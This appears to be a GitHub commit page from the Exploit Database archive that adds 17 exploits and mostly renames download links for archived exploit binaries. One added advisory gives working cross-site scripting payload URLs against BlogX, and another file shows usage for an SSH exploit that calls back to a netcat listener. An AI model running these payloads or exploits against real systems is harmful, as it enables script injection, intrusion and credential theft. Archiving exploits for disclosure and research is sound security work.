Skip to content

Commit b3321b3

Browse files
author
Offensive Security
committed
DB: 2015-05-15
17 new exploits
1 parent c9501aa commit b3321b3

343 files changed

Lines changed: 855 additions & 616 deletions

File tree

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

files.csv

Lines changed: 229 additions & 213 deletions
Large diffs are not rendered by default.

platforms/android/local/9477.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
22

33
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
4-
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz
4+
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
55

66
# milw0rm.com [2009-08-18]

platforms/asp/remote/15213.pl

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@
1010
# Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.
1111
# A similar exploitation vector was also added lately in Padbuster v0.3:
1212
# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
13-
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl
13+
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15213.pl (padBuster.pl)
1414
#
1515
#
1616
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)

platforms/asp/webapps/37015.txt

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
source: http://www.securityfocus.com/bid/52730/info
2+
3+
Matthew1471 BlogX is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
http://www.example.com/About.asp?ShowOriginal="><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b
8+
9+
http://www.example.com/About.asp?ShowOriginal=Y&ShowNew="><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b
10+
11+
http://www.example.com/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges="><SCRIPT>alert("demonalex");</SCRIPT>
12+
13+
http://www.example.com/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0

platforms/asp/webapps/8719.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@
1515

1616
# for working with this exploit you need two asp file for updating hash you can download both from :
1717
# www.abysssec.com/files/dana.zip
18-
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip
18+
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8719.zip (2009-dana.zip)
1919

2020
# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
2121

platforms/freebsd/local/12090.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri
1515
improper handling of environment variables.
1616

1717
Download:
18-
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0404.pdf
18+
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12090.pdf (cybsec_advisory_2010_0404.pdf)

platforms/freebsd/local/12091.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -14,4 +14,4 @@ Vulnerability Description:
1414
Some files that allow to obtain usernames and other internal information can be read by any user inside
1515
the CLI.
1616

17-
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0403.pdf
17+
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12091.pdf (cybsec_advisory_2010_0403.pdf)

platforms/freebsd/remote/17462.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -196,7 +196,7 @@ Kingcope
196196
A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2.
197197

198198
the statically linked binary can be downloaded from http://isowarez.de/ssh_0day
199-
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ssh_0day.tar.gz
199+
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17462.tar.gz (ssh_0day.tar.gz)
200200

201201
run like ./ssh -1 -z <yourip> <target>
202202
setup a netcat, port 443 on yourip first

platforms/freebsd/remote/18181.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -33,5 +33,5 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :>
3333
/Signed "the awesome" Kingcope
3434

3535
Code:
36-
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7350roaringbeastv3.tar
36+
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18181.tar (7350roaringbeastv3.tar)
3737

platforms/freebsd/webapps/12658.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,4 +15,4 @@ improper profile check.
1515
===========
1616
Download:
1717
===========
18-
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf
18+
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf)

0 commit comments

Comments
 (0)